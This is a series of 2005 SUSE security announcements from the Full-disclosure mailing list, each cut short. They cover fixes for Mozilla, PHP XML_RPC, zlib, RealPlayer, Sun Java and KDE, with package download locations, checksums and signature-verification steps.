ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/apache2-example-pages-2.0.49-27.29.i586.rpm 6ba6fde3121ce95efed896b55b3616b4 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/apache2-prefork-2.0.49-27.29.i586.rpm 825ff943742470dcf2deb459094dfc77 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/apache2-worker-2.0.49-27.29.i586.rpm cab6bc047c236ca9c19445103bf2b08a ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/libapr0-2.0.49-27.29.i586.rpm df114a68dc94134f1f78266c8a9b4162 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/apache2-2.0.49-27.29.src.rpm 64a3415d384bae98734bfb029a0bfd74 SUSE Linux 9.0: ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/apache-1.3.28-79.i586.rpm 3ea2571ee8b8f7533cfa19254ce76000 ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/apache2-2.0.48-152.i586.rpm e79c7b6cd99c86101dbae77d66a355b7
[Full-disclosure] SUSE Security Announcement: Mozilla various security problems (SUSE-SA:2005:045)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:mozilla,MozillaFirefox,epiphany,galeon Announcement ID:SUSE-SA:2005:045 Date: Thu, 11 Aug 2005 15:00:00 + Affected Products: 8.2, 9.0, 9.1, 9.2, 9.3 SUSE Linux Desktop 1.0 SUSE Linux Enterprise Server 8, 9 Novell Linux Desktop 9 Vulnerability Type: information leak Severity (1-10):7 SUSE Default Package: yes Cross-References: MFSA 2005-56 CAN-2005-2270 MFSA 2005-55 CAN-2005-2269 MFSA 2005-54 CAN-2005-2268 MFSA 2005-53 CAN-2005-2267 MFSA 2005-52 CAN-2005-2266 MFSA 2005-51 CAN-2005-1937 MFSA 2005-50 CAN-2005-2265 MFSA 2005-49 CAN-2005-2264 MFSA 2005-48 CAN-2005-2263 MFSA 2005-47 CAN-2005-2262 MFSA 2005-46 CAN-2005-2261 MFSA 2005-45 CAN-2005-2260 Content of This Advisory: 1) Security Vulnerability Resolved: Various security problems in the Mozilla suite and Mozilla Firefox Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion Various security vulnerabilities in the mozilla browser suite and the Mozilla Firefox browser have been reported and fixed upstream. The Mozilla suite browser has been updated to a security fix level of Mozilla 1.7.11, the Mozilla Firefox browser has been updated to a fix level of Firefox 1.0.6. Security relevant bugs that are fixed include (but are not limited to): MFSA 2005-56 Code execution through shared function objects MFSA 2005-55 XHTML node spoofing MFSA 2005-54 Javascript prompt origin spoofing MFSA 2005-52 Same origin violation: frame calling top.focus() MFSA 2005-51 The return of frame-injection spoofing MFSA 2005-50 Possibly exploitable crash in InstallVersion.compareTo() MFSA 2005-49 Stealing of sensitive information via _search and the Firefox sidebar MFSA 2005-48 Same-origin violation with InstallTrigger callback MFSA 2005-47 Set as wallpaper javascript: privilege escalation MFSA 2005-46 XBL scripts ran even when Javascript disabled MFSA 2005-45 Content-generated event vulnerabilities This update also upgrades the version of the Mozilla suite for the following products: * SUSE Linux Desktop 1.0: The original Mozilla 1.4 branch browser is upgraded to the Mozilla 1.7 branch version. We were not able to port the galeon web browser included in SUSE Linux Desktop 1.0 to support Mozilla 1.7 in time, so we no longer support it. The galeon package on SUSE Linux Desktop 1.0 is removed by this update. * SUSE Linux Enterprise Server 8: The original Mozilla 1.4 branch browser is upgraded to the Mozilla 1.7 branch version. * SUSE Linux Enterprise Server 9: The Mozilla version 1.6 shipped with GA of the SUSE Linux Enterprise Server 9 was replaced by the Mozilla 1.7 branch version in Service Pack 2. * SUSE Linux 8.2, 9.0, 9.1: The Mozilla version 1.4 and 1.6 contained in the SUSE Linux versions 8.2 up to 9.1 was replaced by the Mozilla 1.7 branch version. We were not able to port the galeon and the epiphany web browsers included in SUSE Linux 9.0 up to 9.1 to support Mozilla 1.7 in time, so we will no longer support it. The galeon and epiphany packages on SUSE Linux 9.0 and 9.1 are removed by this update. 2) Solution or Work-Around Please install the upgraded packages and make sure you restart your browsers after the update. A workaround would be to deinstall the Mozilla browser suite and/or the Firefox web browser. 3) Special Instructions and Notes Please note that galeon will be de installed by this update on SUSE Linux Desktop 1.0, SUSE Linux 8.2, 9.0 and 9.1. Also note that epiphany will be de installed by this update on SUSE Linux 9.0 and 9.1. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates
[Full-disclosure] SUSE Security Announcement: php/pear XML RPC remote code execution (SUSE-SA:2005:041)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:php/pear XML::RPC Announcement ID:SUSE-SA:2005:041 Date: Fri, 08 Jul 2005 16:00:00 + Affected Products: 8.2, 9.0, 9.1, 9.2, 9.3 SUSE Linux Enterprise Server 9 Vulnerability Type: remote code execution Severity (1-10):6 SUSE Default Package: no Cross-References: CAN-2005-1921 Content of This Advisory: 1) Security Vulnerability Resolved: PHP XML::RPC code injection vulnerability Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion A bug in the PEAR::XML_RPC library allowed remote attackers to pass arbitrary PHP code to the eval() function. The updated php packages fix the XML::RPC bug, however several third party PHP packages include a copy of the problematic XML::RPC code itself and might be still vulnerable after the update. Please check their respective websites whether the package is vulnerable. The following projects are known to include the XML::RPC code: - tikiwiki - postnuke - drupal - b2evolution - b2 - phpGroupWare - eGroupware - Serendipity Weblog - phpAdsNew - Max Media Manager This issue is tracked by the Mitre CVE ID CAN-2005-1921. The bug in the SUSE php packages affects SUSE Linux versions from 8.2 up to 9.3, SUSE Linux Enterprise Server 9 and Open Enterprise Server. php4 on SUSE Linux Enterprise Server 8 is not affected, since it was not shipping the XML::RPC extension. 2) Solution or Work-Around Please install the updated packages. 3) Special Instructions and Notes Make sure that all PHP projects you installed additionally have the XML RPC flaw fixed. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web. x86 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-mod_php4-4.3.10-14.6.i586.rpm 6ceb12d50de0b3d64da8e729d49e28c0 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/apache2-mod_php5-5.0.3-14.6.i586.rpm 20d09cc7000e3249f662c77f2eb75085 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/mod_php4-servlet-4.3.10-14.6.i586.rpm 60e214f227b6da8297a73a6d1acc29a0 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-4.3.10-14.6.i586.rpm 6f2cdf6f6febe9b562b1435cf4ff57be ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-devel-4.3.10-14.6.i586.rpm a22e97ac02e87da1e37556ae383a6e57 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-exif-4.3.10-14.6.i586.rpm fe9b58e62bdc17ef2fdc661f771d84ba ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-fastcgi-4.3.10-14.6.i586.rpm 2bc6962c584f435dcb57869b5972a633 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-pear-4.3.10-14.6.i586.rpm a1fdae81e0eb168d4c313afa0cbe9098 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-session-4.3.10-14.6.i586.rpm f158545c61aa1cbc73f9b57c24fc8c2a ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php4-sysvshm-4.3.10-14.6.i586.rpm c12e433ce5b96d23f6fafea0ff85fb94 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-5.0.3-14.6.i586.rpm 67461b805f48580e24f9620e0d300e0b ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-devel-5.0.3-14.6.i586.rpm 1df77fcb3c89ae908b9d705b72f4c188 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-exif-5.0.3-14.6.i586.rpm 7d077071cb7d16a114cd718462a0c0c4 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/php5-fastcgi-5.0.3-14.6.i586.rpm
[Full-disclosure] SUSE Security Announcement: zlib denial of service attack (SUSE-SA:2005:039)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:zlib Announcement ID:SUSE-SA:2005:039 Date: Wed, 06 Jul 2005 14:00:00 + Affected Products: 9.1, 9.2, 9.3 SUSE Linux Enterprise Server 9 Novell Linux Desktop 9 Open Enterprise Server Vulnerability Type: remote denial of service Severity (1-10):7 SUSE Default Package: yes Cross-References: CAN-2005-2096 Content of This Advisory: 1) Security Vulnerability Resolved: zlib denial of service attack Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion A denial of service condition was fixed in the zlib library. Any program using zlib to decompress data can be crashed by a specially handcrafted invalid data stream. This includes web browsers or email programs able to view PNG images (which are compressed by zlib), allowing remote attackers to crash browser sessions or potentially anti virus programs using this vulnerability. This issue is tracked by the Mitre CVE ID CAN-2005-2096. Since only zlib 1.2.x is affected, older SUSE products are not affected by this problem. 2) Solution or Work-Around Install the updated packages. 3) Special Instructions and Notes Please restart running programs using zlib. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web. x86 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/zlib-1.2.2-5.2.i586.rpm 69306a26b2f9cbaadd139adafe8ec4ac ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/zlib-devel-1.2.2-5.2.i586.rpm e8f2b4dd7ac1a58850ceb78f806167fc ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/zlib-32bit-9.3-7.1.x86_64.rpm 08a77c7932298f449c1a82808f254110 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/zlib-devel-32bit-9.3-7.1.x86_64.rpm 5855d394fa83bd00e63c3dd921696ea3 SUSE Linux 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/zlib-1.2.1-74.2.i586.rpm 8f9d09a2d49a351261f4b317e4cd ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/zlib-devel-1.2.1-74.2.i586.rpm 2143442ba3f12fa0d76be2fa98b1db8a ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/zlib-32bit-9.2-200507042003.x86_64.rpm 4850236d95a259a406e4d4d6c93b8859 ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/zlib-devel-32bit-9.2-200507042003.x86_64.rpm 1d559edb263577bff25d1016777ebb55 SUSE Linux 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/zlib-1.2.1-70.9.i586.rpm 51e2ae37c32d4979d1da05b667289640 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/zlib-devel-1.2.1-70.9.i586.rpm 3a7fd561f637ecfcf2f3b5118e48327a ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/i586/zlib-32bit-9.1-200507042050.i586.rpm 8070a09339374edeb50cf1d72249964f ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/i586/zlib-devel-32bit-9.1-200507042050.i586.rpm 91d1551e541e00e4bfefff68afc7ed8f source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/zlib-1.2.1-70.9.src.rpm c2cf9d2d338d44ab0af7cc4612053ef6 x86-64 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/zlib-1.2.2-5.2.x86_64.rpm 9d76d7e17c4bd39b76671ae085667e68 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/zlib-devel-1.2.2-5.2.x86_64.rpm cc3090fe5ec5abbe7db63cb8f2191643 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/zlib-1.2.2-5.2.src.rpm 3a5b7b89f1cafe11d6650e45c15105a9 SUSE Linux 9.2:
[Full-disclosure] SUSE Security Announcement: RealPlayer remote buffer overflow (SUSE-SA:2005:037)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:RealPlayer Announcement ID:SUSE-SA:2005:037 Date: Mon, 27 Jun 2005 12:00:00 + Affected Products: SUSE LINUX 9.2, 9.3 Novell Linux Desktop 9 Vulnerability Type: remote code execution Severity (1-10):8 SUSE Default Package: yes Cross-References: CAN-2005-1766 CAN-2005-1277 Content of This Advisory: 1) Security Vulnerability Resolved: remote buffer overflow in RealPlayer Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion Various security problems were found in RealPlayer that allow a remote attacker to execute code in the local player by providing handcrafted files. See http://service.real.com/help/faq/security/050623_player/EN/ too. The following security bugs are listed: - To fashion a malicious MP3 file to allow the overwriting of a local file or execution of an ActiveX control on a customer's machine. - To fashion a malicious RealMedia file which uses RealText to cause a heap overflow to allow an attacker to execute arbitrary code on a customer's machine. - To fashion a malicious AVI file to cause a buffer overflow to allow an attacker to execute arbitrary code on a customer's machine. - Using default settings of earlier Internet Explorer browsers, a malicious website could cause a local HTML file to be created and then trigger an RM file to play which would then reference this local HTML file. (Not applicable to Linux.) The updated package fixes these problems. These are tracked by the Mitre CVE IDs CAN-2005-1766 and CAN-2005-1277. This bug affects all SUSE Linux versions including RealPlayer. However, due to the binary only nature of RealPlayer we are only able to provide fixed packages for SUSE Linux 9.2, 9.3 and Novell Linux Desktop 9. For the SUSE Linux versions containing RealPlayer 8 we are no longer able to offer security updates (as announced in SUSE-SA:2005:04). 2) Solution or Work-Around Please install the upgraded packages. 3) Special Instructions and Notes Please restart web browser which have Real Media content open. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web. x86 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/RealPlayer-10.0.5-0.1.i586.rpm 0e61a92f6867ebc94283a734381d0ad5 SUSE Linux 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/RealPlayer-10.0.5-0.1.i586.rpm d5c0cef03bef44c91971f41195d91afb __ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. __ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify file replacing file with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made DATE using RSA key ID 3D25D3D9 gpg: Good signature from SuSE Security Team [EMAIL PROTECTED] where DATE is replaced by the date
[Full-disclosure] SUSE Security Announcement: SUN Java security problems (SUSE-SA:2005:032)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:java2 Announcement ID:SUSE-SA:2005:032 Date: Wed, 22 Jun 2005 13:00:00 + Affected Products: 8.2, 9.0, 9.1, 9.2, 9.3 SUSE Linux Desktop 1.0 SUSE Linux Enterprise Server 9 Open Enterprise Server 9 Novell Linux Desktop 9 Vulnerability Type: remote code execution Severity (1-10):8 SUSE Default Package: yes Cross-References: CAN-2005-0836 CAN-2005-1974 Content of This Advisory: 1) Security Vulnerability Resolved: java applet and java webstart security problems Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion Two security bugs in the SUN Java implementation have been fixed. Java Web Start can be exploited remotely due to an error in input validation of tags in JNLP files, so an attacker can pass arbitrary command-line options to the virtual machine to disable the sandbox and get access to files. This is tracked by the Mitre CVE ID CAN-2005-0836. The second bug is equal to the first one but can also triggered by untrusted applets. This is tracked by the Mitre CVE ID CAN-2005-1974. 2) Solution or Work-Around Install the updated packages. A possible workaround is to disable Java Applets in your web browser. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the file name of the downloaded RPM package. Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web. x86 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/java-1_4_2-sun-1.4.2.08-0.1.i586.rpm fbc21570966da99cd3bb7f1c1fd636c8 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/java-1_4_2-sun-alsa-1.4.2.08-0.1.i586.rpm 82f310e66597d11099f61364945b48ce ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/java-1_4_2-sun-demo-1.4.2.08-0.1.i586.rpm f7bb684e9fe2aaa5a683957afc8b6517 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/java-1_4_2-sun-devel-1.4.2.08-0.1.i586.rpm 76f6a5edc2c3994548c2ddcbe3a4484f ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/java-1_4_2-sun-jdbc-1.4.2.08-0.1.i586.rpm 729c184ea79b88bdc5a63b08160d7315 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/java-1_4_2-sun-plugin-1.4.2.08-0.1.i586.rpm 34656e90494245d8d024ce4c62a9514d ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/java-1_4_2-sun-src-1.4.2.08-0.1.i586.rpm 5435cecd1ac5b765a0be01548af7d718 SUSE Linux 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/java-1_4_2-sun-1.4.2.08-0.1.i586.rpm 2441a70049233806e65f2628ef43d8e7 ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/java-1_4_2-sun-alsa-1.4.2.08-0.1.i586.rpm 794e45b4c1ee93d7afcfcc764699cce0 ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/java-1_4_2-sun-demo-1.4.2.08-0.1.i586.rpm 4fb798a547e358259da3cc9eb4e3a787 ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/java-1_4_2-sun-devel-1.4.2.08-0.1.i586.rpm 7ac2e1fdb86be84452f43fe7d0226ba7 ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/java-1_4_2-sun-jdbc-1.4.2.08-0.1.i586.rpm 29f7be94acb971a69037a8816baec070 ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/java-1_4_2-sun-plugin-1.4.2.08-0.1.i586.rpm 72d6c05a072e85f23d8a0ba2a8d44bab ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/java-1_4_2-sun-src-1.4.2.08-0.1.i586.rpm a4c9c005e71e95a5badf98d0cfcdbf27 SUSE Linux 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/java2-1.4.2-129.14.i586.rpm
[Full-disclosure] SUSE Security Announcement: RealPlayer buffer overflow in RAM file handling (SUSE-SA:2005:026)
-BEGIN PGP SIGNED MESSAGE- __ SUSE Security Announcement Package:RealPlayer Announcement-ID:SUSE-SA:2005:026 Date: Wed, 20 Apr 2005 09:00:00 + Affected products: 9.2, 9.3 Novell Linux Desktop 9 Vulnerability Type: remote code execution Severity (1-10):8 SUSE default package: yes Cross References: Content of this advisory: 1) security vulnerability resolved: buffer overflow in RAM file handling problem description 2) solution/workaround 3) special instructions and notes 4) package location and checksums 5) pending vulnerabilities, solutions, workarounds: See SUSE Security Summary Report. 6) standard appendix (further information) __ 1) problem description, brief discussion This update fixes a security issue within the RealPlayer media player. A remote attacker could craft a special .RAM (Real Audio Media) file which would cause a buffer overflow when played within RealPlayer. This is the Real Player Update as referenced on this page: http://service.real.com/help/faq/security/050419_player/EN/ 2) solution/workaround None, please install the updated packages. 3) special instructions and notes Restart RealPlayer if running. 4) package location and checksums Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command rpm -Fhv file.rpm to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. x86 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/RealPlayer-10.0.4-1.1.i586.rpm b6ca6d5c87690fca385981ccf272ddf1 SUSE Linux 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/RealPlayer-10.0.4-1.1.i586.rpm 7e87cb712e6f07b9bdefe4f2ea79d6d0 __ 5) Pending vulnerabilities in SUSE Distributions and Workarounds: See SUSE Security Summary Report. __ 6) standard appendix: authenticity verification, additional information - Package authenticity verification: SUSE update packages are available on many mirror ftp servers all over the world. While this service is being considered valuable and important to the free and open source software community, many users wish to be sure about the origin of the package and its content before installing the package. There are two verification methods that can be used independently from each other to prove the authenticity of a downloaded file or rpm package: 1) md5sums as provided in the (cryptographically signed) announcement. 2) using the internal gpg signatures of the rpm package. 1) execute the command md5sum name-of-the-file.rpm after you downloaded the file from a SUSE ftp server or its mirrors. Then, compare the resulting md5sum with the one that is listed in the announcement. Since the announcement containing the checksums is cryptographically signed (usually using the key [EMAIL PROTECTED]), the checksums show proof of the authenticity of the package. We disrecommend to subscribe to security lists which cause the email message containing the announcement to be modified so that the signature does not match after transport through the mailing list software. Downsides: You must be able to verify the authenticity of the announcement in the first place. If RPM packages are being rebuilt and a new version of a package is published on the ftp server, all md5 sums for the files are useless. 2) rpm package signatures provide an easy way to verify the authenticity of an rpm package. Use the command rpm -v --checksig file.rpm to verify the signature of the package, where file.rpm is the filename of the rpm package that you have downloaded. Of course, package authenticity verification can only target an un-installed rpm package file. Prerequisites: a) gpg is installed b) The package is signed using a certain key. The public part of this key must be installed by the gpg program in the directory ~/.gnupg/ under the user's home directory who performs the signature verification (usually root). You can import
[Full-disclosure] SUSE Security Announcement: various KDE security problems (SUSE-SA:2005:022)
-BEGIN PGP SIGNED MESSAGE- __ SUSE Security Announcement Package:kdelibs3 Announcement-ID:SUSE-SA:2005:022 Date: Mon, 11 Apr 2005 15:00:00 + Affected products: 9.1, 9.2, 9.3 SUSE Linux Enterprise Server 9 Novell Linux Desktop 9 Vulnerability Type: remote code execution local denial of service Severity (1-10):8 SUSE default package: yes Cross References: CAN-2005-0237 CAN-2005-0396 Content of this advisory: 1) security vulnerability resolved: several security problems in KDE problem description 2) solution/workaround 3) special instructions and notes 4) package location and checksums 5) pending vulnerabilities, solutions, workarounds: See SUSE Security Summary Report. 6) standard appendix (further information) __ 1) problem description, brief discussion Several vulnerabilities have been identified and fixed in the KDE desktop environment. - A buffer overflow via specially crafted PCX pictures was fixed. This could lead to a remote attacker being able to execute code as the user opening or viewing a PCX images. This PCX image could have been embedded within a web page or Email. This affects SUSE Linux 9.1 up to 9.3, SUSE Linux Enterprise Server 9 and Novell Linux Desktop 9. - The IDN domain name cloaking problem was fixed. A remote website could disguise its name as another potentially trusted site by using a extension originally meant for non-ASCII domain names by using homographs which look exactly like other letters. The fix used by KDE is only use homographs for trusted domains. It is disabled by default for the .net, .com and .org domains. This issue exists in SUSE Linux 9.1 and 9.2, SUSE Linux Enterprise Server 9 and Novell Linux Desktop 9. It has been assigned the Mitre CVE ID CAN-2005-0233. - A denial of service attack against the DCOP service was fixed. A local user could cause another users KDE session to visible hang by writing bad data to the world writable DCOP socket. The socket has been made writable only for the user itself. This was found by Sebastian Krahmer of SUSE Security. This affects all SUSE Linux versions, except SUSE Linux 9.3. Updates for SUSE Linux up to 9.0 and SUSE Linux Enterprise Server 8 are not included for this minor issue. They will be included should a later security update for different issues be necessary. This is tracked by the Mitre CVE ID CAN-2005-0396. Additionally following bug was fixed: - A possible race in the DNS resolver causing unresolved hosts in rare cases was fixed. This only affected SUSE Linux 9.3. 2) solution/workaround Please install the updated packages. 3) special instructions and notes Make sure you restart your KDE session after this update. 4) package location and checksums Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command rpm -Fhv file.rpm to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. x86 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kdelibs3-3.4.0-20.3.i586.rpm 6b63160218d7e9023418980186942ab3 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/kdelibs3-32bit-9.3-7.1.x86_64.rpm 7de0dcf016ad28f3f95c9110a376dc7b SUSE Linux 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kdelibs3-3.3.0-34.5.i586.rpm 47c8c9ccb24b30261de0910ff5bfa19e ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/kdelibs3-32bit-9.2-200504081300.x86_64.rpm 7da9ca5c0cefb043ea170c59beaa588a SUSE Linux 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kdelibs3-3.2.1-44.46.i586.rpm 6dd4f0b38a750f256f6639decda2a968 ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/i586/kdelibs3-32bit-9.1-200504071814.i586.rpm 955791a7b3973698f2c9ea8b0cd09716 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kdelibs3-3.2.1-44.46.src.rpm 3f5585b97d663b7d6d9bcac0f8c0b7a0 x86-64 Platform: SUSE Linux 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/kdelibs3-3.4.0-20.3.x86_64.rpm
